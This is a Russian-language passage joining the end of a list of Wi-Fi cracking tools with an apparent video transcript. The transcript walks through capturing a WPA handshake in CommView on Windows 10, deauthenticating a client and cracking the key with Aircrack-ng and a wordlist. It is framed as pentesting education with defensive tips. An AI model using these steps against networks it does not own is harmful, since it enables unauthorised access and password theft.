Ещё один простой инструмент для взлома паролей для сетей WEP. Как и предыдущие подобные инструменты в списке, он позволяет восстанавливать пароль из некоторого количества перехваченных пакетов. Но для работы программы нужна карта с поддержкой режима монитора.

8. Wifiphisher

Работа этого инструмента очень сильно отличается от того, что мы видели ранее. Если все описанные выше инструменты нацелены на технические уязвимости протокола, то здесь используется социальный инжиниринг. Утилита получает пароль от WPA/WPA2-сети методом фишинга. Она отключает пользователя от его сети и подключает к своей. А затем выдает в браузере сообщение, что пользователь должен ввести пароль от Wi-Fi для установки обновлений. Затем пароль передается взломщику, а пользователь продолжает пользоваться интернетом, не подозревая, что произошло.

9. Reaver

Reaver — это программа для взлома пароля WiFi, которая позволяет получать шифр от сетей WPS путём прямого перебора. Работа утилиты основана на том, что PIN WPS можно пробовать неограниченное количество раз. Большинство роутеров уже получили защиту от этой уязвимости, но не все

10. Wifite

Wifite — инструмент, похожий на Reaver, тоже написанный на Python и тоже предназначенный для взлома сетей WPS. Действует аналогичным методом перебора, но более новый и имеет несколько дополнительных функций.

11. WepDecrypt

WepDecrypt — инструмент для взлома WEP-сетей. Поддерживаются несколько методов взлома ключей, начиная от атаки по словарю и заканчивая алгоритмами анализа. Для работы программы нужны некоторые системные библиотеки.

12. Pyrit

Pyrit — отличный инструмент для выполнения атак перебора по словарю на протоколы WPA/WPA2. Утилита поддерживает параллельные вычисления с помощью видеокарты, используя Cuda или OpenCL, а значит, может быть очень эффективной. Но это всё ещё атака по словарю, а значит, чем сложнее пароль, тем он безопаснее.

13. Infernal Twin

Evil twin (злой двойник) — это инструмент для создания фейковой точки доступаWi-Fi. Пользователь подключается к поддельной сети и передает ей свои данные. Она может использоваться для кражи паролей, перехвата трафика, фишинга и многого другого.

14. Pixiewps

Pixiewps — это инструмент, используемый для подбора PIN-кода WPS в автономном режиме с использованием низкой или несуществующей энтропии некоторых программных реализаций, так называемой «атаки Pixie Dust».

В отличие от традиционной онлайн-атаки грубой силой, реализованной в таких инструментах, как Reaver или Bully, которые стремятся восстановить PIN за несколько часов, этот метод может получить PIN-код всего за секунды или минуты, в зависимости от цели, если уязвимый.

15. Crunch

Простая утилита, которую можно использовать для генерации списков слов и словарей на основе определённых последовательностей. Она может генерировать все возможные комбинации и перестановки.

16. Airgeddon

Airgeddon это набор готовых скриптов, которые в полуавтоматическом цикле проведут вас по всем стадиям: от перевода беспроводной карты в режим монитора, через выбор цели и захват рукопожатия к взлому пароля Wi-Fi. Он автоматизирует использование различных инструментов, поэтому вводить консольные команды не придётся. Для его использования не требуется понимания принципов работы Wi-Fi или того, как именно выполняются атаки. Таким образом, с использованием этого инструмента справятся даже самые неопытные пользователи.

Выводы

В этой статье мы рассмотрели лучшие программы для взлома Wi Fi, которые вы можете применять для тестирования безопасности своих сетей. Например, теперь вы знаете, что ни в коем случае нельзя использовать шифрование WEP, потому что его можно взломать за несколько минут.

Многие из этих инструментов используются сетевыми администраторами и программистами для решения проблем с беспроводными сетями. Они действительно могут помочь при проблемах с подключением системы к сети. Но большое количество людей интересуются, не как защитить свою сеть, а как получить пароли от чужих и бесплатный доступ к интернету.

Но не забывайте — такое несанкционированное вторжение может быть незаконным в вашей стране. Будьте аккуратны при использовании этих инструментов и применяйте их только в законных целях.

Мы постарались собрать все лучшие программы для взлома пароля Wi-Fi, но возможно мы что-то и упустили.

Zip File, мамкины хакеры. После того, как на канале стали регулярно выходить ролики по взлому с использованием такого замечательного инструмента, как Kali Linux, подписчики в комментариях интересуются, можно ли проделать, нечто подобное из-под обычной винды. Перехватить хендшейк, брутфорснуть его словарём. И всё это исключительно с использованием Windows 10.

Честно признаться, я очень долго оттягивал запись этого ролика. Просто потому, что порог вхождения в тему пентестинга и те знания, которые для этого требуются по моему мнению должны хоть немного превышать уровень среднестатистического пользователя и в большей степени оставаться прерогативой админов и безопасников.

Однако, раз уж есть стабильный спрос, давайте сегодня наконец удовлетворим просьбы страждущих ответив на насущный вопрос. Да, перехват хендшейка и последующий подбор посредством брутфорса вполне возможен и из-под обычной винды. Правда для этого придётся дополнительно скачать несколько утилит.

CommView for Wifi Windows 10

Шаг 1. Первая – это CommView for WiFi. Достаточно популярная прога для мониторинга и анализа пакетов под Windows. Во времена моей преподавательской деятельности, для тех, кто не в курсе, до недавнего времени я вёл практику у сетевых и системных администраторов в местном техникуме.

Так вот, в то время я уделял ей особое внимание. Её интерфейс гораздо дружелюбнее, нежели у того же WireShark’а, а функций в полнофункциональной версии хватает с головой. Сейчас же, для быстрой демонстрации я воспользуюсь демкой. На офф сайте tamos.ru открываем раздел «Загрузка» и кликаем по кнопке скачать напротив названия нужного нам продукта.

Шаг 2. Откроется страница с перечислением всех адаптеров, которые поддерживаются программой. Список, мягко говоря, не велик. У меня подходящая плата была только в ноутбуке жены, поэтому большая часть урока записана на нём. Надеюсь, вам повезёт больше. После того, как убедились, что сетевуха подходит, кликаем «Скачать CommView for WiFi».

Шаг 3. И по завершению загрузки запускаем установочный EXE’шник внутри архива.

Шаг 4. Next.

Шаг 5. Принимаю.

Шаг 6. Стандартный режим. Никакой IP-телефонии нам не нужно.

Шаг 7. Путь установки по дефолту.

Шаг 8. Язык – русский. Ярлыки создать.

Шаг 9. Погнали.

Шаг 10. После завершения установки, жмём «Finish».

Шаг 11. И ждём, пока откроется главное окно. Видим, что прога нашла совместимый адаптер и предлагает нам установить собственный драйвер. Сразу предупрежу, что после его установки ваша сетевуха перестанет работать в штатном режиме и перейдёт в режим монитора. Сети при это не будут видеться через стандартную службу Windows. Далее, я покажу, как это исправить. Но сначала завершим начатое. Скрепя сердце жмём «Далее».

Шаг 12. Установить драйвер.

Шаг 13. После инсталляции непременно перезагружаем компьютер.

Как пользоваться CommView For Wifi

Шаг 14. Отлично. Дождавшись включения запускаем ярлычок CommView и в главном окне программы выбираем справа режим сканирования всех каналов.

Шаг 15. Видим предупреждение о том, что оценочная версия позволяет захватывать трафик не дольше 5 минут. Нам, признаться, дольше то и не нужно. Кликаем «Продолжить».

Шаг 16. Дожидаемся, пока наша сеть появится в списке и тормозим сканирование. Запоминаем, а ещё лучше записываем MAC-адрес точки, SSID и номер канала, на котором она работает в данный момент.

Шаг 17. Переводим программу в одноканальный режим и указываем уже конкретно канал нашей точки. Врубаем перехват заново.

Шаг 18. И чтобы не ждать, пока одно из устройств отключится, а затем подключится к роутеру, дабы инициировать «Рукопожатие», отправим пакеты деаутентификации. Вкладка «Инструмента» — «Реассоциация узлов».

Шаг 19. Послать 100 пакетов с интервалом 10 мсек. Проверяем точку. Смотрим клиентов. Рекомендую откидывать не более 1 за раз. Послать сейчас. Всё. Ждёмс. Яблочное устройство отвалилось и вновь законнектилось, а значит можно двигаться дальше.

Шаг 20. Тормозим перехват.

Шаг 21. И переходим на вкладку «Пакеты». На самом деле из всей этой истории нас интересуют только EAPOL паки. В момент коннекта устройство обменивается с роутером 4 пакетами этого типа. Внутри содержится пароль от точки в зашифрованном виде. Совсем скоро мы его достанем и дешифруем. Вызываем контекстное меню, «Открыть пакеты в новом окне» — «Все».

Шаг 22. Далее «Файл» — «Экспорт log-файлов» — «Формат Wireshark/Tcpdump».

Шаг 23. Указываем место для сохранения и присваиваем файлу понятное имя. «Сохранить».

CommView For Wifi не видит сети

Шаг 24. Усё. CommView можно закрывать и переходить к загрузке второй программы. Однако тут возникнет сложноcть о которой я уже упоминал ранее. Сетки не видятся. Нужно восстановить нормальный драйвер.

Шаг 25. Запускаем «Диспетчер устройств».

Шаг 26. В списке сетевых адаптеров ищем тот, что содержит приписку «CommView» и идём в «Свойства».

Шаг 27. На вкладке драйвер кликаем по заветной кнопочке «Откатить».

Шаг 28. Указываем причину. Предыдущая версия работала явно лучше. Жмём «ОК».

Шаг 29. И после завершения отката проверяем список сеток. Тэкс. Всё хорошо. Инет снова работает.

Aircrack-ng Windows 10

Шаг 30. Открываем браузер и переходим на сайт aircrack-ng.org. Тут прям на главной странице есть кнопка загрузки утильки под винду. Качаем.

Шаг 31. И после загрузки распаковываем всю эту историю в отдельную папку. Внутри открываем каталог «bin» и запускаем файлик «Aircrack-ng GUI». Это старый добрый эир, но с графическим интерфейсом. Хоть какое-то преимущество от использования Виндовса.

Шаг 32. Выбираем тип – «WPA». В первой строчке указываем путь к файлу с добытым ранее хендшейком.

Шаг 33. Во второй указываем путь к словарю. Ссылку на те, что юзаю я, найдёте в описании к видео.

Шаг 34. Ставим галочку «Advanced option» и указываем имя интересующей нас точки и MAC-адрес. Помните, ранее, я специально просил вас зафиксировать эти данные. Жмём «Launch».

Шаг 35. Пошла жара. Если пассворд присутствует в словаре, он обязательно дешифруется через какое-то время.

Как-то так, друзья. Напоминаю, что все действия я демонстрирую исключительно в целях повышения уровня вашей осведомлённости в области пентестинга и информационной безопасности.

Устройства и точки, используемые в качестве жертвы в уроках, принадлежат мне. Вам в свою очередь, я крайне не рекомендую повторять подобные вещи на своих девайсах и уж точно ни в коем случае не испытывайте судьбу на чужих.

При таком сценарии данные действия могут быть расценены, как противоправные и привести к печальным последствиям. Лучше используйте полученные знания во благо и обезопасьте себя и своих близких от взлома подобного рода.

Сделать это очень просто. Достаточно использовать сложный пароль. С буквами в верхнем и нижнем регистре, цифрами и спец. символами. Перевести WiFi на роутере в режим 5ГГц и сформировать белый список с MAC-адресами ваших устройств.

Кстати, если вам действительно интересна тема сетей, их безопасности, но вы пока не готовы к переходу на Linux, рекомендую вам ознакомиться с моим обучающим курсом по Администрированию Windows Server 2016.

В нём я рассматриваю основные моменты, касательно контроля сети с использованием штатных средств данной ОС. Грамотную настройку групповых политик, разграничение доступа посредством квот и многое другое. Ссылку с подробностями ищите в описании.

На этом сегодня всё. Если впервые забрёл на канал, то после просмотра не забудь нажать колокольчик. Кликнешь и в твоей ленте будут регулярно появляться годнейшие ролики на тему взлома, пентестинга и сисадминства.

С олдов, как обычно, по лайку. Удачи, успехов, ребятки. Защищайте себя и свои сети. Не пренебрегайте паролями и главное, не переставайте учиться новому, никогда. С вами был Денис Курец. Благодарю за просмотр. Всем пока.